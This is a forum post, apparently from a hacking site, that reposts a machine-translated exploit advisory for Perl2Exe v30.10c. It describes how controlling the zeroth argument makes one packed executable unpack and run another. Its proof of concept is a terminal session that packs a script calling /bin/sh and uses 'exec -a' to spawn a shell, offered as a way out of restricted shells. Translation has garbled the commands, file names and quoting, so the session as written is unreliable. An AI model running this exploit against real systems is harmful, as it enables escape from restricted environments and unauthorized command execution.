H

使用Perl2Exe V30.10C创建的可执行文件- 任意代码执行

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#用perl2exe=v30.10c创建的可执行文件exploit title: - 任意代码执行
#日期: 10/17/2023
#利用作者: Declazyo
#供应商homepage3360 https://www.indigostar.com/
#软件链接: https://www.indigostar.com/download/p2x-30.10-linux-x64-5.30.1.tar.gz
#版本:=v30.10c
#测试在: Ubuntu 22.04
#Description:
perl2exe将perl脚本包装到本机可执行文件中。
这些执行使用的第0个参数可以找到一个文件以解开和执行。
因此,可以通过控制0th参数来执行此类可执行文件以执行与Perl2exe一起编译的另一个可执行文件。
这对于摆脱受限的外壳环境可能是有用的。
#证明和概念:
用户@testing:〜/示例$ ls
P2X-30.10-Linux-X64-5.30.1.tar.gz Perl2Exe-Linux-X64-5.30.1
用户@testing:〜/示例$
用户@testing:〜/示例$#创建并打包一个“安全” perl脚本以攻击目标。
用户@testing:〜/示例$ echo'print('我完全安全\ n');' SAFE.PL
用户@testing:〜/示例$ ./perl2exe-linux-x64-5.30.1/perl2exe safe.pl
PERL2EXE V30.10C 2020-12-11版权(C)1997-2020 Indigostar软件
.
生成安全
用户@testing:〜/示例$
用户@testing:〜/示例$#检查程序是否按预期执行。
用户@testing:〜/示例$ ./safe
我完全安全
用户@testing:〜/示例$
用户@testing:〜/示例$#创建并打包我们要执行的“恶意”脚本。
用户@testing:〜/示例$ echo'print('j/k i是恶意af \ n'); system('/bin/sh');'恶意
用户@testing:〜/示例$ ./perl2exe-linux-x64-5.30.1/perl2exe malicis.pl
PERL2EXE V30.10C 2020-12-11版权(C)1997-2020 Indigostar软件
.
产生恶意
用户@testing:〜/示例$
用户@testing:〜/示例$#我们的“恶意”文件不需要拥有执行权限。
用户@testing:〜/示例$ chmod -x恶意
用户@testing:〜/示例$ ./malicious
-bash:/malicious:许可拒绝
用户@testing:〜/示例$
用户@testing:〜/示例$#以“恶意”程序的名称作为0个参数执行“安全”程序。
用户@testing:〜/示例$#“安全”程序将解开包装并执行“恶意”程序,而不是自身。
用户@testing:〜/示例$ bash -c'exec -a恶意./safe'
j/k我是恶意的AF
$ Pstree -s $$
systemd-─-sshd-─.isshd---shistist---- ssh-─-bash-─-ac---安全─.................
$
 
后退
顶部